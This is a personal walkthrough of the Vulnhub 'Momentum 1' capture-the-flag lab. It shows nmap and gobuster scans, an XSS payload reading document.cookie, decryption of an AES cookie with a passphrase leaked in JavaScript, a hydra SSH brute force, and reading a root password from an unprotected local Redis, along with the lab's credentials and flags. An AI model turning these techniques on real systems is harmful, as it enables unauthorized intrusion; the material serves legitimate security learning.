Vulnhub Momentum 1 Writeup
Momentum 1
First i started off with a network scan to obtain the IP and services of the box
1
2
nmap $IP/24
nmap -sC -sV -oN nmap/initial $IP
once done i see that their is an ssh port and an http port open on the box
seeing that it is a webserver i decided to start my enumeration to see if their are any extra pages i might miss.
1
gobuster dir -u http://$IP/ -w ~/path/to/wordlist.txt
looking through the output i see nothing useful so i go digging in the webpage with inspect element. while looking through the files and what happens when reloaded i look at the source code of the site. along with the js files and css.
in the js file i notice this
1
2
3
4
5
6
7
8
9
10
function viewDetails(str) {
window.location.href = "opus-details.php?id="+str;
}
/*
var CryptoJS = require("crypto-js");
var decrypted = CryptoJS.AES.decrypt(encrypted, "SecretPassphraseMomentum");
console.log(decrypted.toString(CryptoJS.enc.Utf8));
*/
having just recently started looking at Javascript i see that their is another webpage that my enumeration couldnt find. i emediatly take the bit of url their and past it into the url of the site. in doing so i see that whatever i put down in the id= field will be displayed on the webpage. again having just recently started messing with XSS i go and try to exicute an alert and it worked.( pretty simple )
i tried multiple different things such as: a remote shell (didnt work), LFI (didnt work), even some DB scripts, and nothing. then while doing some research i saw that most people when given a cookie try stuff with that. so i went and looked at the cookie in inspect-element -> application -> cookie or by causing the page to execute
<script> alert(document.cookie)</script>
it looked to be encrypted and with the info the js file gave me i figured it was using crypto-js with AES to encrypt it. so i looked online for a decoder and found one here that was able to decrypt it for me. it needed the password in order to decrypt which i saw in the js file that it was ” SecretPassphraseMomentum “ which in turn gave me this as the text ” auxerre-alienum## “
now with this i figured with the ssh port open it might be a password but what would i use as the username and password? given the decrypted passphrase i figured it had to be some permutation of it so i made a [[passphrase.txt|wordlist]] to bruteforce it with hydra.
1
hydra -L wordlist.txt -P wordlist.txt <IP of target> ssh
and bam i got the username and password
1
[22][ssh] host: <ip> login: auxerre password: auxerre-alienum##
so i ssh’d in with the credentials
1
2
ssh auxerre@<ip>
auxerree@<ip> password: auxerre-alienum##
once in i see a user.txt i cat it out and
1
2
3
4
[ Momentum - User Owned ]
---------------------------------------
flag : 84157165c30ad34d18945b647ec7f647
---------------------------------------
First flag!!!
now to get root.
i imported [[linpeas.sh|linpeas]] to autoenumerate and found that their was an open port on 6379 listening on localhost. after a little research i see that it is a [[6379-pentesting-redis|redis]] instance and that it potentialy could be used as a privesc vector. looking at the documentation on what commands to do to log in i found out i can just use
1
redis-cli
and then similar to a ftp connection i can find info in the instance. using the command
keys *
i see that their is a key called rootpass and so i
get rootpass
and i recieved this string m0mentum-al1enum##
i then logged in as root with the password
1
2
su root
Password: m0mentum-al1enum##
once logged in i cat root.txt in /root and get
1
2
3
4
5
[ Momentum - Rooted ]
---------------------------------------
Flag : 658ff660fdac0b079ea78238e5996e40
---------------------------------------
by alienum with <3
i now have the final flag!!